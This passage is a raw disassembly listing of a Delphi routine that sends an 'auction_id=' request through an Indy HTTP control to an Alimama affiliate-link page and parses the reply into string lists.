004BAE93 8D55C0 lea edx, [ebp-$40]
004BAE96 8B45F8 mov eax, [ebp-$08]

|
004BAE99 E80E85FFFF call 004B33AC
004BAE9E 8D45C0 lea eax, [ebp-$40]
004BAEA1 8D55D0 lea edx, [ebp-$30]

|
004BAEA4 E87B85FFFF call 004B3424
004BAEA9 8B55D0 mov edx, [ebp-$30]
004BAEAC A154DD4C00 mov eax, dword ptr [$004CDD54]
004BAEB1 8B8088030000 mov eax, [eax+$0388]
004BAEB7 8B4014 mov eax, [eax+$14]
004BAEBA 8B08 mov ecx, [eax]
004BAEBC FF5154 call dword ptr [ecx+$54]
004BAEBF 8BD8 mov ebx, eax
004BAEC1 83FBFF cmp ebx, -$01
004BAEC4 0F851F020000 jnz 004BB0E9
004BAECA 8B55F8 mov edx, [ebp-$08]
004BAECD B898B24B00 mov eax, $004BB298

|
004BAED2 E8F9ABF4FF call 00405AD0
004BAED7 8BF8 mov edi, eax
004BAED9 85FF test edi, edi
004BAEDB 0F8E81020000 jle 004BB162
004BAEE1 8B45F8 mov eax, [ebp-$08]
004BAEE4 8945D4 mov [ebp-$2C], eax
004BAEE7 837DD400 cmp dword ptr [ebp-$2C], +$00
004BAEEB 740B jz 004BAEF8
004BAEED 8B45D4 mov eax, [ebp-$2C]
004BAEF0 83E804 sub eax, +$04
004BAEF3 8B00 mov eax, [eax]
004BAEF5 8945D4 mov [ebp-$2C], eax
004BAEF8 8D45F0 lea eax, [ebp-$10]
004BAEFB 50 push eax
004BAEFC 8B4DD4 mov ecx, [ebp-$2C]
004BAEFF 2BCB sub ecx, ebx
004BAF01 8D5701 lea edx, [edi+$01]
004BAF04 8B45F8 mov eax, [ebp-$08]

|
004BAF07 E8E0AAF4FF call 004059EC
004BAF0C 837DF000 cmp dword ptr [ebp-$10], +$00
004BAF10 0F844C020000 jz 004BB162
004BAF16 8B45F0 mov eax, [ebp-$10]

|
004BAF19 E8B6FDFFFF call 004BACD4
004BAF1E 84C0 test al, al
004BAF20 0F843C020000 jz 004BB162
004BAF26 833D64DD4C0000 cmp dword ptr [$004CDD64], +$00
004BAF2D 0F842F020000 jz 004BB162
004BAF33 B868DD4C00 mov eax, $004CDD68
004BAF38 8B55F8 mov edx, [ebp-$08]

|
004BAF3B E808A6F4FF call 00405548
004BAF40 B201 mov dl, $01

* Reference to class TStringList
|
004BAF42 A1A8AA4100 mov eax, dword ptr [$0041AAA8]

|
004BAF47 E8CC95F4FF call 00404518
004BAF4C 8945E4 mov [ebp-$1C], eax
004BAF4F B201 mov dl, $01

* Reference to class TStringList
|
004BAF51 A1A8AA4100 mov eax, dword ptr [$0041AAA8]

|
004BAF56 E8BD95F4FF call 00404518
004BAF5B 8945E0 mov [ebp-$20], eax
004BAF5E 8D45BC lea eax, [ebp-$44]
004BAF61 8B4DF0 mov ecx, [ebp-$10]

* Possible String Reference to: 'auction_id='
|
004BAF64 BAA4B24B00 mov edx, $004BB2A4

|
004BAF69 E89EA8F4FF call 0040580C
004BAF6E 8B55BC mov edx, [ebp-$44]
004BAF71 8B45E4 mov eax, [ebp-$1C]
004BAF74 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_38
|
004BAF76 FF5138 call dword ptr [ecx+$38]
004BAF79 8D45B8 lea eax, [ebp-$48]
004BAF7C 50 push eax
004BAF7D A154DD4C00 mov eax, dword ptr [$004CDD54]

* Reference to control IdHTTP : TIdHTTP
|
004BAF82 8B806C030000 mov eax, [eax+$036C]
004BAF88 8B4DE4 mov ecx, [ebp-$1C]

* Possible String Reference to: 'http://taoke.alimama.com/spreader/g
| en_auction_code.htm'
|
004BAF8B BAB8B24B00 mov edx, $004BB2B8

|
004BAF90 E80BA9FDFF call 004958A0
004BAF95 8B55B8 mov edx, [ebp-$48]
004BAF98 8B45E0 mov eax, [ebp-$20]
004BAF9B 8B08 mov ecx, [eax]

* Possible reference to virtual method TStringList.OFFS_2C
|
004BAF9D FF512C call dword ptr [ecx+$2C]
004BAFA0 8B45E0 mov eax, [ebp-$20]
004BAFA3 8B10 mov edx, [eax]

* Possible reference to virtual method TStringList.OFFS_14
|
004BAFA5 FF5214 call dword ptr [edx+$14]
004BAFA8 48 dec eax
004BAFA9 85C0 test eax, eax
004BAFAB 0F8C26010000 jl 004BB0D7
004BAFB1 40 inc eax
004BAFB2 8945D8 mov [ebp-$28], eax
004BAFB5 C745DC00000000 mov dword ptr [ebp-$24], $0000
